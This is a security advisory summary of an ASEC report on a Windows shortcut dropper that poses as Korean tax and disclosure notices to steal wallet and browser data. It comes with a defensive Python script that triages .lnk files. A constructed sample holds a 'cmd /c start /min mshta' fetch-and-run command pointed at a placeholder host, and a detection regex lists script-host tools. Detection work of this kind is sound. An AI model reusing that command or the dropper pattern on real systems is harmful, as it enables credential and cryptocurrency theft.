Malicious LNK Disguised as Notices

AhnLab’s ASEC has identified a malicious LNK (Windows shortcut) file targeting Korean users that collects sensitive data, including cryptocurrency wallet information and browser credentials. When the shortcut is opened, it downloads and runs a malicious HTA file, which carries additional scripts that perform keylogging and information theft.

Affected: Korean users, digital asset holders

Key points:

  • A malicious LNK file was discovered that targets Korean users for data theft.
  • The shortcut disguises itself as documents such as local tax bills and public disclosure notices.
  • Opening the LNK file downloads a malicious HTA file from the threat actor’s server.
  • The HTA file carries a ZIP archive containing multiple files, including PowerShell scripts.
  • 1.log collects sensitive information and executes commands received from the server, while 2.log performs keylogging.
  • The malware targets data from cryptocurrency wallets and browser profiles.
  • The scripts look for specific file types and file names when gathering data to steal.
  • The use of a distribution URL imitating a Korean portal site indicates a targeted attack against a specific demographic.
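
As an added example (not code from the ASEC report or from AhnLab), the following Python script parses the Shell Link header and StringData of a .lnk file and scores it against the lure pattern described above: a document-style icon, a script host such as mshta or cmd as the real target, a remote URL in the arguments, and a window that opens minimized. The sample shortcuts, their paths and the example.invalid URL are constructed for the demonstration and are not the campaign’s indicators.

```python
"""Static triage of Windows .lnk files for the notice-lure dropper pattern.

Parses the Shell Link header and StringData (MS-SHLLINK) and flags shortcuts
that combine a document-style icon with a script host / LOLBin target, a
remote URL in the arguments and a minimized window. Sample LNKs are built
in memory so the script runs offline; they are constructed, not real samples.
"""
import re
import struct
from dataclasses import dataclass

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_IDLIST, HAS_LINKINFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x08, 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that opens the target minimized

LOLBIN = re.compile(r"\b(mshta|powershell|pwsh|cmd|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin|curl)(?:\.exe)?\b", re.I)
REMOTE_URL = re.compile(r"https?://\S+", re.I)
DOC_ICON = re.compile(r"(hwp|hnc|hancom|pdf|acrord|winword|excel|\.docx?|\.xlsx?|\.txt)", re.I)


@dataclass
class LnkStrings:
    show_command: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def parse_lnk(data: bytes) -> LnkStrings:
    """Return ShowCommand plus the StringData fields of a Shell Link file."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = 76
    if flags & HAS_IDLIST:      # LinkTargetIDList: 2-byte size followed by the IDList (skipped here)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:    # LinkInfo: 4-byte size covering the whole structure
        off += struct.unpack_from("<I", data, off)[0]

    def read_string() -> str:
        nonlocal off
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            s = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            s = data[off:off + count].decode("cp1252", errors="replace")
            off += count
        return s

    result = LnkStrings(show_command=show_command)
    # StringData fields appear in this fixed order, each present only if its flag is set
    for flag, attr in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                       (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                       (HAS_ICON, "icon_location")):
        if flags & flag:
            setattr(result, attr, read_string())
    return result


def triage_lnk(data: bytes) -> dict:
    """Score a .lnk against the lure pattern; two or more reasons is suspicious."""
    lnk = parse_lnk(data)
    reasons = []
    hosts = sorted({m.group(1).lower() for m in LOLBIN.finditer(lnk.relative_path + " " + lnk.arguments)})
    if hosts:
        reasons.append("script host/LOLBin in target or arguments: " + ", ".join(hosts))
    url = REMOTE_URL.search(lnk.arguments)
    if url:
        reasons.append("remote URL in arguments: " + url.group(0))
    if lnk.show_command == SW_SHOWMINNOACTIVE:
        reasons.append("window opens minimized (ShowCommand=7)")
    if hosts and DOC_ICON.search(lnk.icon_location):
        reasons.append("document-style icon masks an executable target: " + lnk.icon_location)
    return {"reasons": reasons, "score": len(reasons),
            "verdict": "suspicious" if len(reasons) >= 2 else "low"}


def build_lnk(relative_path: str, arguments: str, icon_location: str, show_command: int = 1) -> bytes:
    """Construct a minimal Unicode .lnk (header + StringData + TerminalBlock) for testing."""
    flags = IS_UNICODE | HAS_RELPATH | HAS_ARGS | HAS_ICON
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0,
                         show_command, 0, 0, 0, 0)

    def s(v: str) -> bytes:
        return struct.pack("<H", len(v)) + v.encode("utf-16-le")

    return header + s(relative_path) + s(arguments) + s(icon_location) + struct.pack("<I", 0)


# Constructed samples: hypothetical paths and URL, not the real campaign's values
SAMPLE_LURE = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    "/c start /min mshta https://example.invalid/docs/notice.hta",
    r"%ProgramFiles%\Hnc\Office\Hwp.exe",
    show_command=SW_SHOWMINNOACTIVE,
)
SAMPLE_BENIGN = build_lnk(r"..\..\..\Windows\System32\notepad.exe", "", "")

if __name__ == "__main__":
    for label, blob in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(label, triage_lnk(blob))
```

Run the script directly to see both verdicts, or call triage_lnk(open(path, "rb").read()) on files collected from a mailbox or download folder. The parser skips the LinkTargetIDList rather than decoding it, so a shortcut whose target is expressed only in the ID list and not in the relative path or arguments would need a full IDList walk to be scored; a hit on the minimized-window or remote-URL rule alone is still worth a closer look even when the score stays below the threshold.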

MITRE ATT&CK techniques:

  • Input Capture: Keylogging (T1056.001) and Clipboard Data (T1115): 2.log captures keystrokes and clipboard contents.
  • Application Layer Protocol: Web Protocols (T1071.001): 1.log periodically contacts the attacker’s server over the web to receive additional commands.
  • Credentials from Web Browsers (T1555.003): 1.log collects encrypted browser credential data and public certificates from browsers, and decrypts the protected browser data with the Windows Data Protection API (DPAPI).
  • Exfiltration Over C2 Channel (T1041): the stolen data is compressed (Archive Collected Data, T1560) and uploaded to the threat actor’s server via the UploadFile function in 1.log.

Indicators of Compromise:

  • [URL] https[:]//nid-naveroup[.]servepics[.]com/docs/revenue.zip
  • [URL] https[:]//cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/prevenue[.]hta
  • [URL] https[:]//cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw[.]hta
  • [URL] https[:]//cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/wsoj[.]hta
  • [MD5] 1b90eff0b4f54da72b19195489c3af6c

Full Story: https://asec.ahnlab.com/en/87620/